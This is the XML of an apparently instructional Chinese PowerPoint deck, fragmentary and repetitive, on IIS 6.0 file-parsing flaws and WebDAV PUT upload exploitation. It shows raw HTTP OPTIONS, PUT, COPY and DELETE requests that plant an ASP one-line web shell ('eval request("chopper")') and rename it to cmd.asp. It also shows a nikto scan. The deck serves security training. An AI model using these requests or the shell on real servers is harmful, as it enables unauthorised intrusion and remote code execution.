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79" r:id="rId15"/>
    <p:sldId id="280" r:id="rId16"/>
    <p:sldId id="276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中间件解析漏洞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 IIS6.0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</a:t>
            </a:r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上传利用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Burpsuite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IIS PUT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>漏洞利用。先</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OPTIONS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>探测、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PUT 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MOVE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DELETE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308860"/>
            <a:ext cx="10835640" cy="2956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</a:t>
            </a:r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上传利用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Burpsuite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IIS PUT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>漏洞利用。先</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OPTIONS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>探测、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PUT 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MOVE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DELETE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570480"/>
            <a:ext cx="11035665" cy="2299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</a:t>
            </a:r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上传利用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Burpsuite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IIS PUT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>漏洞利用。先</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OPTIONS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>探测、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PUT 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MOVE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DELETE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2324100"/>
            <a:ext cx="11404600" cy="2209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</a:t>
            </a:r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上传利用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Burpsuite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IIS PUT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>漏洞利用。先</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OPTIONS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>探测、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PUT 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MOVE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DELETE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370" y="1963420"/>
            <a:ext cx="8489950" cy="4559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575945" y="2916555"/>
            <a:ext cx="4446905" cy="1489075"/>
            <a:chOff x="4298950" y="2274888"/>
            <a:chExt cx="444690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305617" cy="549275"/>
              <a:chOff x="3702051" y="2081213"/>
              <a:chExt cx="430561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73570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IIS6.0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解析漏洞介绍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8627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IIS6.0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PUT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上传原理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01728" y="2916238"/>
            <a:ext cx="4446905" cy="1458912"/>
            <a:chOff x="4298950" y="4113213"/>
            <a:chExt cx="444690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627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IIS6.0 PUT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上传探测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8627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IIS6.0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PUT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394531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575945" y="2916555"/>
            <a:ext cx="4446905" cy="1489075"/>
            <a:chOff x="4298950" y="2274888"/>
            <a:chExt cx="444690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305617" cy="549275"/>
              <a:chOff x="3702051" y="2081213"/>
              <a:chExt cx="430561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73570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IIS6.0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解析漏洞介绍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8627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IIS6.0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PUT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上传原理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01728" y="2916238"/>
            <a:ext cx="4446905" cy="1458912"/>
            <a:chOff x="4298950" y="4113213"/>
            <a:chExt cx="444690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627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IIS6.0 PUT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上传探测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8627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IIS6.0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PUT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16680" y="3081020"/>
            <a:ext cx="43580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解析漏洞介绍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082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解析漏洞介绍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1482090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(1) 当建立 *.asa、*.asp格式的文件夹时，其目录下的任意文件都将被IIS当作asp文件解析。 &lt;%=NOW()%&gt;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(2) 当文件 *.asp;1.jpg IIS6.0同样会将文件作为asp文件解析。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微软 目前也没有推出补丁，不认为是一个漏洞。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37255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下面在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IIS6.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>中演示这两个解析漏洞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38195" y="3163570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PUT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上传原理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PUT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上传原理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3868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WebDAV 基于HTTP1.1协议的通信协议</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>使得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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>支持PUT MOVE COPY DELETE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>方法。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405" y="2065020"/>
            <a:ext cx="38798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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>探测是否存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IIS PUT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>漏洞：                                  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OPTIONS / HTTP1.1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Host: www.xxx.com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、上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文本文件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PUT /a.txt HTTP1.1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Host：www.xxx.com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Content-Length: 30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&lt;%eval request("chopper")%&gt;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94475" y="2065020"/>
            <a:ext cx="38798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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>通过Move或Copy重名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COPY /a.txt HTTP1.1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Host: www.xxx.com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Destination: http://www.xxx.com/cmd.asp</a:t>
            </a:r>
            <a:endParaRPr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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>删除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DELETE /a.txt HTTP1.1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Host: www.xxx.com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80740" y="3081655"/>
            <a:ext cx="54311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PUT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上传探测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PUT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上传探测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nikto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>探测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-nikto -h IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>地址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830" y="2109470"/>
            <a:ext cx="9070340" cy="432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 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PUT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上传利用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2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IIS6.0介绍</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>IIS6.0 PUT上传原理</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>IIS6.0 PUT上传探测</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>IIS6.0 PUT上传利用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103</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-08-20T13:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-12-10T12:51:50Z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